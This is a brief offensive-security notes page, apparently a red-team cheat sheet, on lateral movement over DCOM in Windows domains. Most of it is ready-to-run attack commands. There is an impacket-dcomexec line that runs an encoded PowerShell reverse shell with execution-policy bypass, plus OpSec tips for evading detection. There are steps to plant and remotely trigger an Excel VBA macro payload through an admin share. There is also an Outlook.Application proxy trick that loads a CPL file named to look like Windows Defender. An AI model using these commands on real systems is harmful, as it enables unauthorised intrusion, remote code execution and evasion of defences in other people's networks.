DCOM Lateral Movement

05.06.2024 · dadevel

Lateral Movement over DCOM.

Execute a reverse shell.

impacket-dcomexec -k -no-pass -nooutput srv01.corp.com "powershell.exe -ep bypass -e $(iconv -t utf16le ./shell.ps1 | base64 -w0)"

OpSec: The command output is written to a file and downloaded over SMB. This can be avoided by specifying -nooutput.

Untested tools:

  • DLHell, Python script for DCOM DLL proxying
  • CheeseDcom, implements many different methods in C#

References:

Excel.Application

Check target 192.168.12.13.

$com = [activator]::CreateInstance([type]::GetTypeFromProgId('Excel.Application', '192.168.12.13'))
$com | Get-Member

Create new Excel document. Select View/Macros, give the macro the name mymacro and insert the following VBA payload.

Sub mymacro()
  shell("calc.exe")
End Sub

Then save the excel sheet in the old *.xls format.

Copy the document.

cp ./evil.xls \\192.168.12.13\c$\evil.xls

When Excel is started trough DCOM it runs in system context and complains about missing folders in its home directory.

mkdir \\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop

Run the macro.

$workbook = $com.Workbooks.Open('C:\evil.xls')
$workbook.Run('mymacro')

Outlook.Application + CPL file

Remote access to some DCOM objects is blocked. Outlook.Application can be used as a proxy to bypass this restriction.

Load CPL file via DCOM.

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("0006F033-0000-0000-C000-000000000046", "ws01.corp.com"))
$b = $a.CreateObject("Shell.Apllication")
$b.ControlPanelItem("%TEMP%\windefend.cpl")

References: